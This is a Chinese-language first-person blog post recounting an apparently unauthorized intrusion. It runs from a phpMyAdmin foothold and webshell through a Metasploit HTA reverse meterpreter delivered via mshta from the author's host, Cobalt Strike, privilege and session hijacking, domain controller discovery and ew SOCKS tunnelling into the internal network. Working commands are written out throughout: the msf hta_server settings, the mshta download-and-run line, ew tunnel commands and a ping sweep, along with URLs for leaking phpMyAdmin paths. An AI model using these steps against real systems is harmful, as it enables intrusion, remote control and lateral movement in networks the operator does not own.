信息收集怎么说呢 肯定是越全面越好 但找到突破口了 就不想去收集其他了 反之如果没找到合适的突破口那可能是收集不够全
感觉这网站(https://scan.top15.cn/web/ )
使其还不错功能挺全 查到的东西也多点 这不phpmyadmin就把头伸过来了
接着看 基本信息还是有必要了解下
工具这东西吧 好是好就是不够准确 妈蛋 Linux 都冒出来了
(判断网站操作系统 最快捷的就是大小写 Windows对网址中的大小写不敏感 Linux则反之)
火狐插件 判断不迷路
口令在手 shell我有
那么问题来了 绝对路径怎么找 首先尝试以下url
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
phpmyadmin/themes/darkblue_orange/layout.inc.php
还有其他方法 比如info
有就更好 没有首先会尝试 谷歌语法了
火狐插件 SetupVPN 挺好用的 免费的 注册就能用 偶尔上个google 挺方便的
还有种方式 就是用谷歌镜像 也还行 毕竟浏览器挂的vpn访问是真的慢
现在万事俱备只差马儿
刚开始蚂剑执行命令是有回显的 第二天执行就没了 让朋友看了下disable_functions什么情况 为什么要为难我
注意服务器改端口 防止 全网爆破流 然后用scerro 挂起后台运行避免ssh断了 cs清空
服务器用的是 阿里云学生机(一年也就一百来块)还是挺不错的
msf生成hta
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp
set lhost xx.xx.xx.xx
set lport 6666
执行 mshta.exe http://xx.xx.xx.xx/pKz4Kk059Nq9.hta
查找了下域控ip 192.168.30.61
这里存活ip检测不够准确(后面cs扫还有给.11主机)
这里 还打过ms17_010无果 忘了截图了--------------
Msf好久没用 不知道感觉用些什么了 还是上cs把 直观点 msf可以转发到cs
但那操作还不如我直接上cs来的快(说白了 就是懒)
到内网 先看是否是域环境 接下来顺序
提权>毕竟很多命令或者程序需要高权限能省不少麻烦(这里已经最高权限)
横向渗透>扩展姿势(ms17_010、口令碰撞、哈希传递、内网web、弱口令其实也就是信息收集过程
拿下域控>毕竟域控才是王道
systeminfo 能看到很多本机信息
收集到的信息为 域环境 虚拟机 2012服务器等 补丁虽然很全 但上来就是最高权限 舒服了
在域内却执行不了 域命令 真是什么奇葩环境都被我遇到了
平时看师傅们文章也没见过这些问题 还是要自己动手才晓得长记性
接着了解到 是域机器但不是域会话 说白了 就是没域用户 现在这个用户是本地最高权限
那还说啥 查看进程 把会话注入到有域用户上
还有种方式 就通过抓取到的口令 用make_token仿冒域用户
这真不清楚了 去他妈的 好惨一男的
这里不是有口令嘛 3389上去看看 这么神奇的玩意儿 到底啥样儿
cs 自带sock4
通过cs 建立sock4代理 加上 windows下面 proxifier
ew(frp也可以但感觉用起没ew顺手)
目标: shell ew_win32.exe -s rssocks -d x.x.x.x. -e 1024
公网ip: ./ew_linux_x64 -s rcsocks -l 1024 -e 1080 &
再用proxifier 连接
还有就是msfconsole 也自带端口转发
cs的端口也带转发 不成功 不清楚原因 说无法绑定
上去看了一眼啥都没 空空荡荡 也没什么可翻找的 就退了 毕竟 用的sock4 慢点一逼
推荐 cs插件脚本 感觉挺全的挑着顺手的用还是有必要的(https://www.codercto.com/a/57741.html )
存活ip
循环ping 查找存活ip 不用上传 cmd 执行
for /l %i in (1,1,255) do @ ping 192.168.124.%i -w 1 -n 1|find /i "ttl="
nbtscan 扫描内网存活ip 及目标所属(看到域了) 大家都在用 上面脚本中有个一键上传的脚本
端口开放 浏览器代理访问 看看是些什么东东